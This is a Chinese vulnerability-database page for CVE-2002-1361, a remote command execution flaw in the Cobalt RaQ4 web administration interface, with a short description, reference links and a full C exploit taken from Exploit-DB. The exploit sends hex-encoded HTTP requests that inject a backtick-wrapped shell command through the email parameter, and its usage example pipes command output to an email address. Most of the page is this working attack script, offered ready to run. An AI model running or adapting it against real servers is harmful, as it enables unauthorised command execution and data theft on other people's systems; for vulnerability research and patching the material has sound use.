Cobalt RaQ4管理接口远程命令执行漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107135 漏洞类型 输入验证
发布时间 2002-12-05 更新时间 2006-08-28
CVE编号 CVE-2002-1361 CNNVD-ID CNNVD-200212-063
漏洞平台 Linux CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/22072
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-063
|漏洞详情
CobaltRaQ是一个基于Internet的服务应用程序,由Sun微系统公司发布和维护。CobaltRaQWEB管理接口在处理用户提供的EMAIL参数时缺少正确过滤,远程攻击者可以利用这个漏洞以WEB进程权限在系统上执行任意命令。攻击者可以向CobaltRaQWEB管理接口中的CGI脚本的包含恶意EMAIL参数的请求,由于CGI脚本处理不充分,可导致以WEB进程权限在系统上执行任意指令。不过这个漏洞只存在安装了RaQ4加固安全包之后的RaQ4服务程序中。
|漏洞EXP
source: http://www.securityfocus.com/bid/6326/info

The RaQ4 is a server appliance distributed and maintained by Sun Microsystems.

A vulnerability has been reported in the web administration interface of the RaQ4. It is possible for a remote attacker to execute commands. By passing malicious email parameter to the vulnerable CGI script, commands are carried out in the security context of the administration server.

This vulnerability only affects RaQ4 servers with the RaQ4 Security Hardening Package (SHP) installed. The SHP is not installed by default.

// RaQ 4 and possibly others easy remote root compromise
// due to a flaw in the Security Hardening package HEHE!
// Wouter ter Maat aka grazer - http://www.i-security.nl
 
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <netdb.h>

#define PORT 81 /* default cobalt admin httpd  
                   try 444 if 81 runs with ssl */

// cmpstr
#define found "overflow" 
#define done "Starting"
#define exec "mail"

// prototypes
int banner();
int makereq(char *host, char *request, char *cmpstr, int port);

int main(int argc, char *argv[]) {
int retval, port;

char cmd[1024];
char cbuf[1024];
char request2[3096];

// evi1 requests
char request1[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
                  "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f"
                  "\x77\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69"
                  "\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n\x48\x6f\x73"
                  "\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";

char req_tmp[] = "\x50\x4f\x53\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e"
		 "\x63\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77"
		 "\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2e\x63\x67\x69\x20\x48"
		 "\x54\x54\x50\x2f\x31\x2e\x31\n\x41\x63\x63\x65\x70\x74\x3a\x20"
		 "\x69\x6d\x61\x67\x65\x2f\x67\x69\x66\x2c\x20\x69\x6d\x61\x67"
		 "\x65\x2f\x78\x2d\x78\x62\x69\x74\x6d\x61\x70\x2c\x20\x69\x6d"
		 "\x61\x67\x65\x2f\x6a\x70\x65\x67\x2c\x20\x69\x6d\x61\x67\x65"
		 "\x2f\x70\x6a\x70\x65\x67\x2c\x20\x2a\x2f\x2a\n\x41\x63\x63"
		 "\x65\x70\x74\x2d\x4c\x61\x6e\x67\x75\x61\x67\x65\x3a\x20\x6e\x6c\n"
		 "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61"
		 "\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x78\x2d\x77\x77"
		 "\x77\x2d\x66\x6f\x72\x6d\x2d\x75\x72\x6c\x65\x6e\x63\x6f\x64"
		 "\x65\x64\n\x41\x63\x63\x65\x70\x74\x2d\x45\x6e\x63\x6f\x64"
		 "\x69\x6e\x67\x3a\x20\x67\x7a\x69\x70\x2c\x20\x64\x65\x66\x6c"
		 "\x61\x74\x65\n\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20"
		 "\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x34\x2e\x30\x20\x28\x3b\x29\n"
		 "\x48\x6f\x73\x74\x3a\x20\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31"
		 "\x3a\x38\x31\n";

char request3[] = "\x47\x45\x54\x20\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x2e\x63"
		  "\x6f\x62\x61\x6c\x74\x2f\x6f\x76\x65\x72\x66\x6c\x6f\x77\x2f"
		  "\x6f\x76\x65\x72\x66\x6c\x6f\x77\x54\x65\x73\x74\x45\x6d\x61"
	          "\x69\x6c\x2e\x63\x67\x69\x20\x48\x54\x54\x50\x2f\x31\x2e\x31\n"
	          "\x48\x6f\x73\x74\x3a\x20\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\n\n\n";

sprintf(cmd, "%s%s%s", "enabled=1&email=`", argv[2], "`&page=overflow\n\n");
sprintf(cbuf, "%s %d %s", "Content-Length:", strlen(cmd)-2, "\n\n");
sprintf(request2, "%s%s%s", req_tmp, cbuf, cmd);

banner();

  while(argc < 3) {
    fprintf(stderr, " %s <host> <command> <port> \n", argv[0]);
    fprintf(stderr, " example: www.cobalt.com \"id|mail you@addy\" 444\n");
    fprintf(stderr, " default port is set to 81. \n\n");
    exit(0); }

if(argc==3) {
port = PORT; }
else { 
port = atoi(argv[3]); }

retval = makereq(argv[1], request1, found, port); 

if(retval==2) { 
  printf(" - name cannot be resolved!\n"); 
 exit(0); } if(retval==3) { 
  printf(" - connect: connection refused! d0h!\n");
 exit(0); }

if(retval==404) { 
  printf(" - this machine is not vulnerable, dweep!\n"); 
 exit(0); }
else { 
  printf(" + ow yeah, we've found a victim!\n"); } 


printf(" ++ Enabling stackguard and creating evil config file...\n");

retval = makereq(argv[1], request2, done, port); 

 if(retval==404) {
   printf(" -- attack failed , sorry! \n"); 
  exit(0);}
 else { 
   printf(" +++ config file written succesfully ! \n"); } 

 printf(" ++++ Let's get our evil command executed...\n");


retval = makereq(argv[1], request3, exec, port); 

if(retval==404) { 
  printf(" --- attack failed, sorry! \n"); 
 exit(0);} 
else { 
printf(" +++++ The command : \"%s\"\n +++++ has been run on the server.\n\n", argv[2]); }

}

int banner() { 
printf("*************************************************\n");
printf("RaQ 4 remote root exploit - grazer@digit-labs.org\n");
printf("Vulnerable : RaQ4 with Security Hardening Update.\n");
printf("             isn't it ironic? :]                 \n");
printf("*************************************************\n"); }

int makereq(char *host, char *request, char *cmpstr, int port) {

int fd, sock, chk;
char buf[2000];

struct sockaddr_in addr; 
struct hostent *lh;

if ((lh=gethostbyname(host)) == NULL){
             return 2; }

bzero(&(addr.sin_zero), 8);
addr.sin_family = AF_INET;
addr.sin_port = htons(port);
addr.sin_addr = *((struct in_addr *) lh-> h_addr);

fd = socket(AF_INET, SOCK_STREAM, 0);

if (connect(fd,(struct sockaddr *) &addr ,sizeof(addr)) != 0){
                return 3;
	}

send(fd, request, strlen(request), 0);
read(fd, buf, 500);
if(strstr(buf, cmpstr)!=0) { 
return 200; } else { 
return 404; }

close(fd);
return 1;
}
|参考资料

来源:CERT/CCAdvisory:CA-2002-35
名称:CA-2002-35
链接:http://www.cert.org/advisories/CA-2002-35.html
来源:US-CERTVulnerabilityNote:VU#810921
名称:VU#810921
链接:http://www.kb.cert.org/vuls/id/810921
来源:XF
名称:cobalt-shp-overflow-privileges(10776)
链接:http://xforce.iss.net/xforce/xfdb/10776
来源:SUNALERT
名称:49377
链接:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/49377
来源:BUGTRAQ
名称:20021205CobaltRaQ4Remoterootexploit
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=103912513522807&w=2
来源:BID
名称:6326
链接:http://www.securityfocus.com/bid/6326
来源:CIAC
名称:N-025
链接:http://www.ciac.org/ciac/bulletins/n-025.shtml